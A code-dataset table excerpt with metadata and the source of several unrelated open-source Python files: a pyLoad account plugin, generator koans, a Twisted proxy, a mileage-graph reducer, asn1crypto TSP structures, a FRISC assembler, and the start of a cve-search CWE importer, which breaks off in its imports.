| repo_name (string, length 5–92) | path (string, length 4–221) | copies (19 classes) | size (string, length 4–6) | content (string, length 766–896k) | license (15 classes) | hash (int64, -9,223,277,421,539,062,000 to 9,223,102,107B) | line_mean (float64, 6.51–99.9) | line_max (int64, 32–997) | alpha_frac (float64, 0.25–0.96) | autogenerated (bool, 1 class) | ratio (float64, 1.5–13.6) | config_test (bool, 2 classes) | has_no_keywords (bool, 2 classes) | few_assignments (bool, 1 class) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
mariusbaumann/pyload
|
module/plugins/accounts/PremiumTo.py
|
1
|
1286
|
# -*- coding: utf-8 -*-
from module.plugins.Account import Account
class PremiumTo(Account):
__name__ = "PremiumTo"
__type__ = "account"
__version__ = "0.06"
__description__ = """Premium.to account plugin"""
__license__ = "GPLv3"
__authors__ = [("RaNaN", "RaNaN@pyload.org"),
("zoidberg", "zoidberg@mujmail.cz"),
("stickell", "l.stickell@yahoo.it")]
def loadAccountInfo(self, user, req):
traffic = req.load("http://premium.to/api/traffic.php",
get={'username': self.username, 'password': self.password})
if "wrong username" not in traffic:
trafficleft = float(traffic.strip()) / 1024 #@TODO: Remove `/ 1024` in 0.4.10
return {'premium': True, 'trafficleft': trafficleft, 'validuntil': -1}
else:
return {'premium': False, 'trafficleft': None, 'validuntil': None}
def login(self, user, data, req):
self.username = user
self.password = data['password']
authcode = req.load("http://premium.to/api/getauthcode.php",
get={'username': user, 'password': self.password}).strip()
if "wrong username" in authcode:
self.wrongPassword()
|
gpl-3.0
| 4,571,049,506,377,407,500
| 34.722222
| 90
| 0.547434
| false
| 3.738372
| false
| false
| false
|
drewmoore/python-koans
|
python3/koans/about_generators.py
|
1
|
4571
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Written in place of AboutBlocks in the Ruby Koans
#
# Note: Both blocks and generators use a yield keyword, but they behave
# quite differently
#
from runner.koan import *
class AboutGenerators(Koan):
def test_generating_values_on_the_fly(self):
result = list()
bacon_generator = (n + ' bacon' for n in ['crunchy','veggie','danish'])
for bacon in bacon_generator:
result.append(bacon)
self.assertEqual(['crunchy bacon', 'veggie bacon', 'danish bacon'], result)
def test_generators_are_different_to_list_comprehensions(self):
num_list = [x*2 for x in range(1,3)]
num_generator = (x*2 for x in range(1,3))
self.assertEqual(2, num_list[0])
# A generator has to be iterated through.
with self.assertRaises(TypeError): num = num_generator[0]
self.assertEqual(2, list(num_generator)[0])
# Both list comprehensions and generators can be iterated through. However, a
# generator is evaluated lazily: its values are generated on the fly as they
# are requested instead of being stored.
#
# Generators are more memory friendly, but less versatile
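# For instance (illustrative, not part of the original koan):
# sum(x * x for x in range(10**6)) consumes one square at a time, while
# sum([x * x for x in range(10**6)]) first builds the full list in memory.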
def test_generator_expressions_are_a_one_shot_deal(self):
dynamite = ('Boom!' for n in range(3))
attempt1 = list(dynamite)
attempt2 = list(dynamite)
self.assertEqual(['Boom!', 'Boom!', 'Boom!'], list(attempt1))
self.assertEqual([], list(attempt2))
# ------------------------------------------------------------------
def simple_generator_method(self):
yield 'peanut'
yield 'butter'
yield 'and'
yield 'jelly'
def test_generator_method_will_yield_values_during_iteration(self):
result = list()
for item in self.simple_generator_method():
result.append(item)
self.assertEqual(['peanut', 'butter', 'and', 'jelly'], result)
def test_coroutines_can_take_arguments(self):
result = self.simple_generator_method()
self.assertEqual('peanut', next(result))
self.assertEqual('butter', next(result))
result.close()
# ------------------------------------------------------------------
def square_me(self, seq):
for x in seq:
yield x * x
def test_generator_method_with_parameter(self):
result = self.square_me(range(2,5))
self.assertEqual([4, 9, 16], list(result))
# ------------------------------------------------------------------
def sum_it(self, seq):
value = 0
for num in seq:
# The local state of 'value' will be retained between iterations
value += num
yield value
def test_generator_keeps_track_of_local_variables(self):
result = self.sum_it(range(2,5))
self.assertEqual([2, 5, 9], list(result))
# ------------------------------------------------------------------
def generator_with_coroutine(self):
result = yield
yield result
def test_generators_can_take_coroutines(self):
generator = self.generator_with_coroutine()
# THINK ABOUT IT:
# Why is this line necessary?
#
# Hint: Read the "Specification: Sending Values into Generators"
# section of http://www.python.org/dev/peps/pep-0342/
next(generator)
self.assertEqual(3, generator.send(1 + 2))
def test_before_sending_a_value_to_a_generator_next_must_be_called(self):
generator = self.generator_with_coroutine()
try:
generator.send(1+2)
except TypeError as ex:
ex2 = ex
self.assertRegexpMatches(ex2.args[0], 'just-started')
# ------------------------------------------------------------------
def yield_tester(self):
value = yield
if value:
yield value
else:
yield 'no value'
def test_generators_can_see_if_they_have_been_called_with_a_value(self):
generator = self.yield_tester()
next(generator)
self.assertEqual('with value', generator.send('with value'))
generator2 = self.yield_tester()
next(generator2)
self.assertEqual('no value', next(generator2))
def test_send_none_is_equivalent_to_next(self):
generator = self.yield_tester()
next(generator)
# 'next(generator)' is exactly equivalent to 'generator.send(None)'
self.assertEqual('no value', generator.send(None))
|
mit
| -7,604,709,203,030,380,000
| 30.308219
| 94
| 0.564209
| false
| 4.006135
| true
| false
| false
|
lkundrak/scraperwiki
|
uml/httpproxy/swproxy.py
|
1
|
1826
|
import sys
from twisted.web import proxy, http
from twisted.python import log
log.startLogging(sys.stdout)
class ScraperProxyClient(proxy.ProxyClient):
def handleHeader( self, key, value ):
proxy.ProxyClient.handleHeader(self, key, value)
def handleResponsePart(self, data):
proxy.ProxyClient.handleResponsePart(self,data)
def handleResponseEnd(self):
proxy.ProxyClient.handleResponseEnd(self)
class ScraperProxyClientFactory(proxy.ProxyClientFactory):
def buildProtocol(self, addr):
client = proxy.ProxyClientFactory.buildProtocol(self, addr)
client.__class__ = ScraperProxyClient
return client
class ScraperProxyRequest(proxy.ProxyRequest):
protocols = { 'http': ScraperProxyClientFactory }
def __init__(self, *args):
proxy.ProxyRequest.__init__(self, *args)
def process(self):
# TODO Process self.uri to see if we are allowed to access it
# We probably want to do an ident with the current controller and
# probably a notify as well. Once we know we can carry on then
# we should process the request.
proxy.ProxyRequest.process(self)
class ScraperProxy(proxy.Proxy):
def __init__(self):
proxy.Proxy.__init__(self)
def requestFactory(self, *args):
return ScraperProxyRequest(*args)
class ScraperProxyFactory(http.HTTPFactory):
def __init__(self):
http.HTTPFactory.__init__(self)
def buildProtocol(self, addr):
protocol = ScraperProxy()
return protocol
if __name__ == '__main__':
from twisted.internet import reactor
px = ScraperProxyFactory()
reactor.listenTCP(9000, px)
reactor.run()
|
agpl-3.0
| -5,316,903,653,732,609,000
| 24.375
| 74
| 0.629244
| false
| 4.226852
| false
| false
| false
|
BartMassey/oregon-mileage
|
reduce-mileages.py
|
1
|
1800
|
# Copyright © 2014 Bart Massey
# [This work is licensed under the "MIT License"]
# Please see the file COPYING in the source
# distribution of this software for license terms.
# Given a mileage list, reduce it to a minimal set of edges
# that imply the same mileages.
# Strategy: Fill the whole list of edges into the
# result, then loop over all triples deleting implied edges.
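# For example (hypothetical mileages): with edges A-B 10, B-C 5 and A-C 15,
# A-C equals A-B + B-C exactly, so it is implied and removed. If A-C were 16,
# the two-hop path would be shorter than the direct edge and the triple would
# be reported as a triangle error instead.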
from sys import stdin, stderr
def read_graph(f):
vs = set()
es = {}
for line in f:
(v1, v2, w) = line.split()
w = int(w)
vs |= {v1}
vs |= {v2}
e = tuple({v1, v2})
if e in es and es[e] != w:
print("warning: edge {%s, %s} mismatch %d / %d" % \
(v1, v2, es[e], w), file=stderr)
continue
es[e] = w
return (vs, es)
def reduced(g):
(vs, es) = g
res = es.copy()
for e in es:
for v in vs:
if e not in res:
continue
(v1, v2) = e
if v1 == v or v2 == v:
continue
e1 = tuple({v1, v})
e2 = tuple({v, v2})
if e1 not in es or e2 not in es:
continue
if es[e1] > es[e] or es[e2] > es[e]:
continue
if es[e1] + es[e2] > es[e]:
continue
if es[e1] + es[e2] < es[e]:
print("triangle error: %d vs %s-%d-%s-%d-%s" % \
(es[e], v1, es[e1], v, es[e2], v2), file=stderr)
continue
print("removing redundant %s %s" % (v1, v2), file=stderr)
del res[e]
return (vs, res)
def write_graph(g):
(_, es) = g
for e in es:
(v1, v2) = e
w = es[e]
print(v1, v2, w)
g = read_graph(stdin)
rg = reduced(g)
write_graph(rg)
|
mit
| -6,409,248,396,742,954,000
| 26.676923
| 70
| 0.473596
| false
| 3.117851
| false
| false
| false
|
eukaryote/asn1crypto
|
asn1crypto/tsp.py
|
1
|
8059
|
# coding: utf-8
"""
ASN.1 type classes for the time stamp protocol (TSP). Exports the following
items:
- TimeStampReq()
- TimeStampResp()
Also adds TimeStampedData() support to asn1crypto.cms.ContentInfo(),
TimeStampedData() and TSTInfo() support to
asn1crypto.cms.EncapsulatedContentInfo() and some oids and value parsers to
asn1crypto.cms.CMSAttribute().
Other type classes are defined that help compose the types listed above.
"""
from __future__ import unicode_literals, division, absolute_import, print_function
from .algos import DigestAlgorithm
from .cms import (
CMSAttribute,
CMSAttributeType,
ContentInfo,
ContentType,
EncapsulatedContentInfo,
)
from .core import (
Any,
BitString,
Boolean,
Choice,
GeneralizedTime,
IA5String,
Integer,
ObjectIdentifier,
OctetString,
Sequence,
SequenceOf,
SetOf,
UTF8String,
)
from .crl import CertificateList
from .x509 import (
Attributes,
CertificatePolicies,
GeneralName,
GeneralNames,
)
# The structures in this file are based on https://tools.ietf.org/html/rfc3161,
# https://tools.ietf.org/html/rfc4998, https://tools.ietf.org/html/rfc5544,
# https://tools.ietf.org/html/rfc5035, https://tools.ietf.org/html/rfc2634
class Version(Integer):
_map = {
0: 'v0',
1: 'v1',
2: 'v2',
3: 'v3',
4: 'v4',
5: 'v5',
}
class MessageImprint(Sequence):
_fields = [
('hash_algorithm', DigestAlgorithm),
('hashed_message', OctetString),
]
class Accuracy(Sequence):
_fields = [
('seconds', Integer, {'optional': True}),
('millis', Integer, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('micros', Integer, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
]
class Extension(Sequence):
_fields = [
('extn_id', ObjectIdentifier),
('critical', Boolean, {'default': False}),
('extn_value', OctetString),
]
class Extensions(SequenceOf):
_child_spec = Extension
class TSTInfo(Sequence):
_fields = [
('version', Version),
('policy', ObjectIdentifier),
('message_imprint', MessageImprint),
('serial_number', Integer),
('gen_time', GeneralizedTime),
('accuracy', Accuracy, {'optional': True}),
('ordering', Boolean, {'default': False}),
('nonce', Integer, {'optional': True}),
('tsa', GeneralName, {'tag_type': 'explicit', 'tag': 0, 'optional': True}),
('extensions', Extensions, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
]
class TimeStampReq(Sequence):
_fields = [
('version', Version),
('message_imprint', MessageImprint),
('req_policy', ObjectIdentifier, {'optional': True}),
('nonce', Integer, {'optional': True}),
('cert_req', Boolean, {'default': False}),
('extensions', Extensions, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
]
class PKIStatus(Integer):
_map = {
0: 'granted',
1: 'granted_with_mods',
2: 'rejection',
3: 'waiting',
4: 'revocation_warning',
5: 'revocation_notification',
}
class PKIFreeText(SequenceOf):
_child_spec = UTF8String
class PKIFailureInfo(BitString):
_map = {
0: 'bad_alg',
2: 'bad_request',
5: 'bad_data_format',
14: 'time_not_available',
15: 'unaccepted_policy',
16: 'unaccepted_extensions',
17: 'add_info_not_available',
25: 'system_failure',
}
class PKIStatusInfo(Sequence):
_fields = [
('status', PKIStatus),
('status_string', PKIFreeText, {'optional': True}),
('fail_info', PKIFailureInfo, {'optional': True}),
]
class TimeStampResp(Sequence):
_fields = [
('status', PKIStatusInfo),
('time_stamp_token', ContentInfo),
]
class MetaData(Sequence):
_fields = [
('hash_protected', Boolean),
('file_name', UTF8String, {'optional': True}),
('media_type', IA5String, {'optional': True}),
('other_meta_data', Attributes, {'optional': True}),
]
class TimeStampAndCRL(Sequence):
_fields = [
('time_stamp', EncapsulatedContentInfo),
('crl', CertificateList, {'optional': True}),
]
class TimeStampTokenEvidence(SequenceOf):
_child_spec = TimeStampAndCRL
class DigestAlgorithms(SequenceOf):
_child_spec = DigestAlgorithm
class EncryptionInfo(Sequence):
_fields = [
('encryption_info_type', ObjectIdentifier),
('encryption_info_value', Any),
]
class PartialHashtree(SequenceOf):
_child_spec = OctetString
class PartialHashtrees(SequenceOf):
_child_spec = PartialHashtree
class ArchiveTimeStamp(Sequence):
_fields = [
('digest_algorithm', DigestAlgorithm, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('attributes', Attributes, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
('reduced_hashtree', PartialHashtrees, {'tag_type': 'implicit', 'tag': 2, 'optional': True}),
('time_stamp', ContentInfo),
]
class ArchiveTimeStampSequence(SequenceOf):
_child_spec = ArchiveTimeStamp
class EvidenceRecord(Sequence):
_fields = [
('version', Version),
('digest_algorithms', DigestAlgorithms),
('crypto_infos', Attributes, {'tag_type': 'implicit', 'tag': 0, 'optional': True}),
('encryption_info', EncryptionInfo, {'tag_type': 'implicit', 'tag': 1, 'optional': True}),
('archive_time_stamp_sequence', ArchiveTimeStampSequence),
]
class OtherEvidence(Sequence):
_fields = [
('oe_type', ObjectIdentifier),
('oe_value', Any),
]
class Evidence(Choice):
_alternatives = [
('tst_evidence', TimeStampTokenEvidence, {'tag_type': 'implicit', 'tag': 0}),
('ers_evidence', EvidenceRecord, {'tag_type': 'implicit', 'tag': 1}),
('other_evidence', OtherEvidence, {'tag_type': 'implicit', 'tag': 2}),
]
class TimeStampedData(Sequence):
_fields = [
('version', Version),
('data_uri', IA5String, {'optional': True}),
('meta_data', MetaData, {'optional': True}),
('content', OctetString, {'optional': True}),
('temporal_evidence', Evidence),
]
class IssuerSerial(Sequence):
_fields = [
('issuer', GeneralNames),
('serial_number', Integer),
]
class ESSCertID(Sequence):
_fields = [
('cert_hash', OctetString),
('issuer_serial', IssuerSerial, {'optional': True}),
]
class ESSCertIDs(SequenceOf):
_child_spec = ESSCertID
class SigningCertificate(Sequence):
_fields = [
('certs', ESSCertIDs),
('policies', CertificatePolicies, {'optional': True}),
]
class SetOfSigningCertificates(SetOf):
_child_spec = SigningCertificate
class ESSCertIDv2(Sequence):
_fields = [
('hash_algorithm', DigestAlgorithm, {'default': 'sha256'}),
('cert_hash', OctetString),
('issuer_serial', IssuerSerial, {'optional': True}),
]
class ESSCertIDv2s(SequenceOf):
_child_spec = ESSCertIDv2
class SigningCertificateV2(Sequence):
_fields = [
('certs', ESSCertIDv2s),
('policies', CertificatePolicies, {'optional': True}),
]
class SetOfSigningCertificatesV2(SetOf):
_child_spec = SigningCertificateV2
EncapsulatedContentInfo._oid_specs['tst_info'] = TSTInfo
EncapsulatedContentInfo._oid_specs['timestamped_data'] = TimeStampedData
ContentInfo._oid_specs['timestamped_data'] = TimeStampedData
ContentType._map['1.2.840.113549.1.9.16.1.4'] = 'tst_info'
ContentType._map['1.2.840.113549.1.9.16.1.31'] = 'timestamped_data'
CMSAttributeType._map['1.2.840.113549.1.9.16.2.12'] = 'signing_certificate'
CMSAttribute._oid_specs['signing_certificate'] = SetOfSigningCertificates
CMSAttributeType._map['1.2.840.113549.1.9.16.2.47'] = 'signing_certificate_v2'
CMSAttribute._oid_specs['signing_certificate_v2'] = SetOfSigningCertificatesV2
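# Example (a sketch, not part of the module; der_bytes is hypothetical input):
#   tsr = TimeStampResp.load(der_bytes)
#   status = tsr['status']['status'].native   # e.g. 'granted'
#   token = tsr['time_stamp_token']           # a cms.ContentInfo holding the token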
|
mit
| -1,249,433,928,822,161,400
| 24.996774
| 101
| 0.617446
| false
| 3.464746
| false
| false
| false
|
zjurelinac/pyFrisc
|
assembler.py
|
1
|
14214
|
from itertools import chain
from math import ceil, log
from utils import *
import os.path
import re
import sys
import yaml
data = dict()
labels = dict()
memory = []
maxnum = 0
# Helper
def show_error( s ):
return s, False
# Helper
def round_to_word( i ):
return int( int( i/data[ 'consts' ][ 'words_per_line' ] + 1 ) * data[ 'consts' ][ 'words_per_line' ]
if i%data[ 'consts' ][ 'words_per_line' ] != 0 else i )
# Helper?
def args_len( args ):
n = 0
while args:
_, args = parse_constant( args )
n += 1
return n
# Procedure
def place_in_mem( res, n ):
for i in range( 0, data[ 'consts' ][ 'words_per_line' ] ):
memory[ n ] = res[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ]
n += 1
# Helper
def to_little_endian( x, n ):
i = 0
arr = []
for i in range( 0, n ):
arr.append( x[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ] )
return ''.join( reversed( arr ) )
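# e.g. assuming 8-bit words: to_little_endian('00000001' + '00000010', 2)
# returns '00000010' + '00000001', i.e. word order is reversed while the
# bits inside each word keep their order.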
# Function, helper
def parse_constant( args, leftovers = True ):
if not args:
raise ValueError( 'Nothing to parse.' )
if args[ 0 ][ 0 ] == '%':
r = int( args[ 1 ], data[ 'consts' ][ 'base_code' ][ args[ 0 ][ 1 ] ] )
a = args[ 2: ] if len( args ) > 2 else []
elif args[ 0 ][ 0 ].isdigit():
r = int( args[ 0 ], data[ 'consts' ][ 'default_base' ] )
a = args[ 1: ] if len( args ) > 1 else []
elif args[ 0 ][ 0 ] == '-':
r = -int( args[ 1 ] , data[ 'consts' ][ 'default_base' ] )
a = args[ 2: ] if len( args ) > 2 else []
elif args[ 0 ] in labels:
r = labels[ args[ 0 ] ]
a = args[ 1: ] if len( args ) > 1 else []
else:
raise ValueError( 'Unknown arguments, cannot parse.' )
if abs( r ) > 2**32:
raise ValueError( 'Constant larger than 32 bits.' )
if not leftovers:
if a: raise ValueError( 'Extra symbols in line.' )
else: return r
else:
return [ r, a ]
# Function, helper
def parse_reg( arg ):
return data[ 'codes' ][ 'REG' ][ arg ]
# Function, helper
def parse_src2( args ):
try:
res = parse_reg( args[ 0 ] ), args[ 1: ]
except KeyError:
res = parse_constant( args, True )
res[ 0 ] = extend20( res[ 0 ] )
return res
# Function
def parse_aluop( cmd, args ):
src1 = parse_reg( args[ 0 ] )
src2, args = parse_src2( args[ 1: ] )
dest = parse_reg( args[ 0 ] )
result = to_little_endian( data[ 'codes' ][ 'ALU' ][ cmd ] + ( '0' if len( src2 ) == 3 else '1' )
+ dest + src1 + src2 + ( '0'*17 if len( src2 ) != 20 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_memop( cmd, args ):
reg = parse_reg( args[ 0 ] )
result = data[ 'codes' ][ 'MEM' ][ cmd ]
if args[ 1 ] != '(':
raise ValueError
try:
loc = parse_reg( args[ 2 ] )
shift = 0
sign = '+'
if args[ 3 ] != ')':
sign = args[ 3 ]
shift, args = parse_constant( args[ 4: ], True )
if len( args ) != 1 or args[ 0 ] != ')':
raise ValueError( 'Incorrect command form.' )
shift = extend20( ( -1 if sign == '-' else 1 ) * shift )
result += '1' + reg + loc + shift
except KeyError:
if args[ 2 ] in labels:
loc = labels[ args[ 2 ] ]
if args[ 3 ] != ')':
raise ValueError( 'Incorrect absolute addressing.' )
else:
loc, args = parse_constant( args[ 2: ], True )
if len( args ) != 1 and args[ 0 ] != '=':
raise ValueError( 'Incorrect command form.' )
loc = extend20( loc )
result += '0' + reg + '000' + loc
result = to_little_endian( result, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_stackop( cmd, args ):
dest = parse_reg( args[ 0 ] )
result = to_little_endian( data[ 'codes' ][ 'STACK' ][ cmd ] + '0' + dest + '0'*23, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_ctrlop( cmd, args ):
if args[ 0 ] == '_':
flag = args[ 1 ]
args = args[ 2: ] if len( args ) > 2 else []
else: flag = '$'
if args[ 0 ] == '(':
op = '0'
loc = parse_reg( args[ 1 ] ) + '0'*17
else:
op = '1'
loc = extend20( parse_constant( args, False ) )
result = to_little_endian( data[ 'codes' ][ 'CTRL' ][ cmd ] + op + data[ 'codes' ][ 'COND' ][ flag ]
+ '00' + loc, data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_retop( cmd, args ):
flag = args[ 1 ] if args and args[ 0 ] == '_' else '$'
result = to_little_endian( data[ 'codes' ][ 'RET' ][ cmd ] + '0' + data[ 'codes' ][ 'COND' ][ flag ]
+ 20*'0' + data[ 'codes' ][ 'RET_CODE' ][ cmd ], data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_moveop( cmd, args ):
a = '0'
src = '000'
srcSR = False
dest = '000'
destSR = False
if args[ 0 ] == 'SR':
args = args[ 1: ]
srcSR = True
elif args[ 0 ] in data[ 'codes' ][ 'REG' ]:
src = parse_reg( args[ 0 ] )
args = args[ 1: ]
else:
a = '1'
src, args = parse_constant( args, True )
src = extend20( src )
if args[ 0 ] != 'SR':
dest = parse_reg( args[ 0 ] )
else:
destSR = True
result = to_little_endian( data[ 'codes' ][ 'MOVE' ] + a + dest + '0' + '{:b}{:b}'.format( srcSR, destSR )
+ src + ( '0'*17 if len( src ) == 3 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_jr( cmd, args, n ):
if args[ 0 ] == '_':
flag = args[ 1 ]
args = args[ 2: ] if len( args ) > 2 else []
else: flag = '$'
# TODO: Beware, if label, that's ok, if a bare number, NOT OK, won't jump N places forward but to address N
offset = parse_constant( args, False )
result = to_little_endian( data[ 'codes' ][ 'JR' ] + '1' + data[ 'codes' ][ 'COND' ][ flag ] + '00'
+ extend20( offset - n - 4 ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def parse_cmp( cmd, args ):
src1 = parse_reg( args[ 0 ] )
src2, args = parse_src2( args[ 1: ] )
result = to_little_endian( data[ 'codes' ][ 'CMP' ] + ( '0' if len( src2 ) == 3 else '1' )
+ '000' + src1 + src2 + ( '0'*17 if len( src2 ) != 20 else '' ), data[ 'consts' ][ 'words_per_line' ] )
return result
# Function
def define_data( cmd, args, n ):
if len(args) < 1:
raise ValueError('Incorrect command format.')
size = data[ 'consts' ][ 'define_data' ][ cmd ]*data[ 'consts' ][ 'word_size' ]
p = []
while args:
x, args = parse_constant( args )
if not fits_into( x, size ):
raise ValueError( 'Cannot place data in memory, {} is too big for {} bits.'.format( x, size ) )
t = to_little_endian( ( '{:0>' + str( size ) + 'b}' ).format( x ), size // data[ 'consts' ][ 'word_size' ] )
p.append( t )
for i in range( 0, size // data[ 'consts' ][ 'word_size' ] ):
y = t[ data[ 'consts' ][ 'word_size' ]*i : data[ 'consts' ][ 'word_size' ]*(i+1) ]
memory[ n ] = y
n += 1
return p
# Function
def define_space( cmd, args, n ):
length = parse_constant( args, False )
for i in range( 0, length ):
memory[ n+i ] = '0'*data[ 'consts' ][ 'word_size' ]
return [ '0'*data[ 'consts' ][ 'line_size' ] ]* ceil( length/data[ 'consts' ][ 'words_per_line' ] )
# Function
def parse_lines( ls ):
lines = []
num = 0
for l in ls:
res = { 'original' : l }
sl = l.upper().split( ';', maxsplit = 1 )[ 0 ]
if sl:
res[ 'blank' ] = False
if sl[ 0 ].isspace(): lab = ''
else:
t = sl.split( maxsplit = 1 )
lab = t[ 0 ]
sl = t[ 1 ] if len( t ) > 1 else ''
ls = re.split( data[ 'consts' ][ 'separators' ], sl.strip() )
res[ 'cmd' ] = ls[ 0 ]
res[ 'args' ] = [ x for x in ls[ 1: ] if x ] if len( ls ) > 1 else []
if not res[ 'cmd' ]: res[ 'blank' ] = True
if res[ 'cmd' ] == data[ 'consts' ][ 'origin_cmd' ]:
nnum = round_to_word( parse_constant( res[ 'args' ] )[ 0 ] )
if nnum < num:
raise ValueError( res[ 'original' ] + ' :: Impossible origin, location too small' )
num = nnum
if lab: labels[ lab ] = num
res[ 'blank' ] = True
elif res[ 'cmd' ] == data[ 'consts' ][ 'equals_cmd' ]:
if lab: labels[ lab ] = parse_constant( res[ 'args' ] )[ 0 ]
res[ 'blank' ] = True
elif res[ 'cmd' ] in data[ 'consts' ][ 'define_data' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += round_to_word( args_len( res[ 'args' ] )*data[ 'consts' ][ 'define_data' ][ res[ 'cmd' ] ] )
elif res[ 'cmd' ] == data[ 'consts' ][ 'define_space' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += round_to_word( parse_constant( res[ 'args' ] )[ 0 ] )
elif res[ 'cmd' ]:
if lab: labels[ lab ] = num
res[ 'num' ] = num
num += data[ 'consts' ][ 'words_per_line' ]
else:
if lab: labels[ lab ] = num
if 'num' not in res:
res[ 'num' ] = -1
else:
res[ 'blank' ] = True
res[ 'num' ] = -1
lines.append( res )
if num >= data[ 'consts' ][ 'max_memory' ]:
raise ValueError( 'Too much memory used' )
global maxnum
maxnum = num
return lines
# Main function
def assemble( f ):
""" Assembles the contents of a file f
This function takes a name f of a file containing FRISC assembler code,
and translates it into machine code.
Two new files are created:
1. readable file containing the machine code together with it's source
2. binary file containing only the machine code
"""
global data, memory, maxnum
data = yaml.load( open( 'config/definitions/frisc.lang.yaml', 'r' ).read(), Loader=yaml.SafeLoader )
memory = [ '00000000' ] * data[ 'consts' ][ 'max_memory' ]
try:
pls = parse_lines( open( f ).read().splitlines() )
except Exception as e:
return show_error( 'An error occurred in first pass: ' + str( e ) )
adr_len = data[ 'consts' ][ 'line_size' ] // 4
prt_len = len( bin_to_pretty_hex( '0' * data[ 'consts' ][ 'line_size' ] ) )
path = os.path.abspath( f )
base = path.rsplit( '.', maxsplit = 1 )[ 0 ]
pfile = open( base + '.p', 'w' )
# efile = open( base + '.e', 'wb' )
j = 1
for p in pls:
if not p[ 'blank' ]:
try:
multiple = False
if p[ 'cmd' ] == 'END':
break
elif p[ 'cmd' ] in data[ 'codes' ][ 'ALU' ]:
p[ 'parsed' ] = parse_aluop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'MEM' ]:
p[ 'parsed' ] = parse_memop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'STACK' ]:
p[ 'parsed' ] = parse_stackop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'CTRL' ]:
p[ 'parsed' ] = parse_ctrlop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'codes' ][ 'RET' ]:
p[ 'parsed' ] = parse_retop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'MOVE':
p[ 'parsed' ] = parse_moveop( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'CMP':
p[ 'parsed' ] = parse_cmp( p[ 'cmd' ], p[ 'args' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] == 'JR':
p[ 'parsed' ] = parse_jr( p[ 'cmd' ], p[ 'args' ], p[ 'num' ] )
place_in_mem( p[ 'parsed' ], p[ 'num' ] )
elif p[ 'cmd' ] in data[ 'consts' ][ 'define_data' ]:
p[ 'parsed' ] = define_data( p[ 'cmd' ], p[ 'args' ], p[ 'num' ] )
multiple = True
elif p[ 'cmd' ] == data[ 'consts' ][ 'define_space' ]:
p[ 'blank' ] = True
else:
print( p )
raise ValueError( 'Unknown command' )
except Exception as e:
return show_error( 'An error occurred in second pass on line ' + str( j )
+ ':' + p[ 'original' ] + ' :: ' + str( e ) )
if p[ 'blank' ]:
pfile.write(( ' ' * ( adr_len + prt_len + 4 ) + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
else:
if multiple:
pfile.write(( ('{:0>' + str( adr_len ) + 'X} ' ).format( p[ 'num' ] ) +
bin_to_pretty_hex( p[ 'parsed' ][ 0 ] ) + ' ' + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
for i in p[ 'parsed' ][ 1: ]:
pfile.write( ' '*( adr_len + 2 ) + bin_to_pretty_hex( i ) + '\n' )
else:
pfile.write(( ('{:0>' + str( adr_len ) + 'X} ' ).format( p[ 'num' ] ) +
bin_to_pretty_hex( p[ 'parsed' ] ) + ' ' + p[ 'original' ] )
[ :data[ 'consts' ][ 'max_source_line_length' ] ] + '\n')
j += 1
pfile.close()
# efile.close()
return 'Source successfully assembled.', True
if __name__ == "__main__":
print( assemble( sys.argv[ 1 ] ) )
|
mit
| 4,892,226,237,462,093,000
| 34.358209
| 126
| 0.459195
| false
| 3.228253
| false
| false
| false
|
deontp/misc
|
zenoic_api/cve-search-master/sbin/db_mgmt_cwe.py
|
1
|
3714
|
#!/usr/bin/env python3
#
# Import script of NIST CWE Common Weakness Enumeration.
#
# Until now, the import is only import Weakness description.
#
# The format is the following:
#
# { "_id" : ObjectId("52b70521b261026f36818515"), "weaknessabs" : "Variant",
# "name" : "ASP.NET Misconfiguration: Missing Custom Error Page",
# "description_summary" : "An ASP .NET application must enable custom error
# pages in order to prevent attackers from mining information from the
# framework's built-in responses.An ASP .NET application must enable custom
# error pages in order to prevent attackers from mining information from the
# framework's built-in responses.", "status" : "Draft", "id" : "12" }
#
# Software is free software released under the "Modified BSD license"
#
# Copyright (c) 2013-2014 Alexandre Dulaunoy - a@foo.be
# Copyright (c) 2015-2016 Pieter-Jan Moreels - pieterjan.moreels@gmail.com
# Imports
import os
import sys
runPath = os.path.dirname(os.path.realpath(__file__))
sys.path.append(os.path.join(runPath, ".."))
from dateutil.parser import parse as parse_datetime
from xml.sax import make_parser
from xml.sax.handler import ContentHandler
import argparse
import zipfile
import tempfile
from lib.ProgressBar import progressbar
